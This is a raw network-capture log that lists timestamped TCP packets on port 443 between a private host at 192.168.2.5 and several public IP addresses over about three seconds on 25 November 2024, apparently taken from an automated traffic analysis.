Nov 25, 2024 11:34:12.969521046 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.089302063 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.089402914 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.089417934 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.089483023 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.089683056 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.090425968 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.090446949 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.090456009 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.091082096 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.322500944 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.323133945 CET	49953	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.323149920 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.323652029 CET	49953	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.323657036 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.332448006 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.332801104 CET	49951	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.332833052 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.333220005 CET	49951	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.333228111 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.335203886 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.335509062 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.335529089 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.335896969 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.335906982 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.391309023 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.391644001 CET	49955	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.391658068 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.392015934 CET	49955	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.392020941 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.392522097 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.392971992 CET	49954	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.392986059 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.393332005 CET	49954	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.393337011 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.457426071 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:13.457451105 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:13.457537889 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:13.457809925 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:13.457827091 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:13.458260059 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:13.458276987 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:13.458919048 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:13.459270954 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:13.459290028 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:13.463449001 CET	49969	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:34:13.463485956 CET	443	49969	204.79.197.219	192.168.2.5
Nov 25, 2024 11:34:13.463738918 CET	49969	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:34:13.464078903 CET	49970	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:34:13.464090109 CET	443	49970	204.79.197.219	192.168.2.5
Nov 25, 2024 11:34:13.464142084 CET	49970	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:34:13.464324951 CET	49969	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:34:13.464337111 CET	443	49969	204.79.197.219	192.168.2.5
Nov 25, 2024 11:34:13.464431047 CET	49970	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:34:13.464443922 CET	443	49970	204.79.197.219	192.168.2.5
Nov 25, 2024 11:34:13.552793980 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:13.553096056 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:13.553108931 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:13.553575039 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:13.553911924 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:13.553992987 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:13.554044008 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:13.599322081 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:13.602399111 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:13.604670048 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:13.605191946 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:13.605206966 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:13.605715990 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:13.605720997 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:13.605751991 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:13.605760098 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:13.613861084 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.614119053 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.614126921 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.614459038 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.614821911 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.614900112 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.614970922 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.615977049 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.616153002 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.616162062 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.616457939 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.616666079 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.616678953 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.617063046 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.617168903 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.617234945 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.617343903 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.617353916 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.617549896 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.617614031 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.617650032 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.617724895 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.617782116 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.617825031 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.618196011 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.618262053 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.618451118 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.618551016 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.618609905 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.618618965 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.618700981 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.621036053 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.621234894 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.621242046 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.624773026 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.624836922 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.625175953 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.625279903 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.625283957 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.625349045 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.659332991 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.659341097 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.659342051 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.664879084 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.664895058 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.664900064 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.680536032 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.680540085 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:13.711766958 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.727413893 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:13.743175030 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:13.743361950 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:13.743374109 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:13.744366884 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:13.744421005 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:13.745304108 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:13.745363951 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:13.745486975 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:13.765260935 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.768594027 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.768655062 CET	49953	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.768688917 CET	49953	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.768697023 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.768706083 CET	49953	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.768709898 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.771661043 CET	49971	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.771691084 CET	443	49971	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.771811008 CET	49971	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.772006035 CET	49971	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.772017956 CET	443	49971	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.784890890 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.786173105 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.787334919 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:13.787811995 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.787885904 CET	49951	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.787987947 CET	49951	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.787987947 CET	49951	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.788001060 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.788012981 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.789535999 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.789648056 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.789660931 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.789683104 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.789736986 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.789807081 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.789824963 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.789834976 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.789839983 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.789951086 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:13.789958954 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:13.790481091 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:13.791871071 CET	49972	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.791884899 CET	443	49972	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.792157888 CET	49972	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.792285919 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:13.792303085 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:13.793102026 CET	49972	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.793118000 CET	443	49972	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.793761015 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:13.793853998 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:13.803082943 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:13.803241014 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:13.803469896 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:13.803502083 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:13.803531885 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:13.803582907 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:13.804256916 CET	49973	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.804280996 CET	443	49973	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.804359913 CET	49973	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.804721117 CET	49973	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.804734945 CET	443	49973	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.825465918 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.828440905 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.828511953 CET	49955	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.828572989 CET	49955	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.828577042 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.828587055 CET	49955	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.828589916 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.831235886 CET	49974	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.831247091 CET	443	49974	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.831377983 CET	49974	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.831490040 CET	49974	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.831505060 CET	443	49974	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.836642027 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.836766958 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:13.839746952 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.839804888 CET	49954	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.839885950 CET	49954	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.839895964 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.839905024 CET	49954	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.839909077 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.841959953 CET	49975	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.841981888 CET	443	49975	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.842112064 CET	49975	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.842240095 CET	49975	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:13.842253923 CET	443	49975	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:13.852457047 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:13.997502089 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:13.997564077 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:13.998019934 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:13.998172045 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:13.998177052 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:13.998191118 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:13.998254061 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:14.057039976 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.057060003 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.057115078 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.057118893 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.057154894 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.057881117 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.057884932 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.059055090 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.059114933 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.059245110 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.059957027 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.059990883 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.060046911 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.060059071 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.062972069 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.062978029 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.063220024 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.063277006 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.063335896 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.063344002 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.063437939 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.063491106 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.064291000 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.064353943 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.068708897 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.068793058 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.068850994 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.068860054 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.068902969 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.069128990 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.069245100 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.069305897 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.072604895 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.072613001 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.119302034 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.119307995 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.119775057 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:14.119782925 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:14.244682074 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:14.244770050 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:14.244826078 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:14.245738983 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:14.245754957 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:14.251769066 CET	49976	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:14.251780987 CET	443	49976	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:14.251835108 CET	49976	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:14.252034903 CET	49976	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:14.252049923 CET	443	49976	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:14.282989979 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:14.283051968 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:14.283493996 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:14.283503056 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:14.285491943 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:14.285496950 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:14.341394901 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.341418982 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.341453075 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.341471910 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:14.341484070 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.341511965 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:14.341810942 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:14.341829062 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.341839075 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:14.341944933 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.341974020 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.342020035 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:14.396898985 CET	49977	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:14.396929026 CET	443	49977	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.397037983 CET	49977	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:14.397212029 CET	49977	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:14.397223949 CET	443	49977	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:14.469113111 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:14.469973087 CET	49966	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:14.469989061 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:14.470359087 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:14.471760988 CET	49966	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:14.471836090 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:14.472186089 CET	49966	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:14.515321016 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:14.547554016 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:14.547697067 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:14.547858000 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:14.548079967 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:14.548110008 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:14.548134089 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:14.548172951 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:14.715466976 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.715718031 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.715730906 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.717169046 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.717238903 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.718337059 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.718420029 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.760550976 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.760806084 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.760819912 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.761791945 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.761869907 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.762137890 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.762200117 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.773968935 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.773978949 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.805257082 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.805263042 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:14.820930004 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.852113008 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:14.934117079 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:14.934226990 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:14.934288979 CET	49966	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:14.935939074 CET	49966	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:14.935947895 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:15.069220066 CET	443	49970	204.79.197.219	192.168.2.5
Nov 25, 2024 11:34:15.069349051 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:15.069376945 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:15.069396973 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:15.069483995 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:15.069483995 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:15.069498062 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:15.069508076 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:15.069556952 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:15.070209026 CET	49970	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:34:15.070218086 CET	443	49970	204.79.197.219	192.168.2.5
Nov 25, 2024 11:34:15.071867943 CET	443	49970	204.79.197.219	192.168.2.5
Nov 25, 2024 11:34:15.072279930 CET	49970	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:34:15.073559046 CET	49970	443	192.168.2.5	204.79.197.219
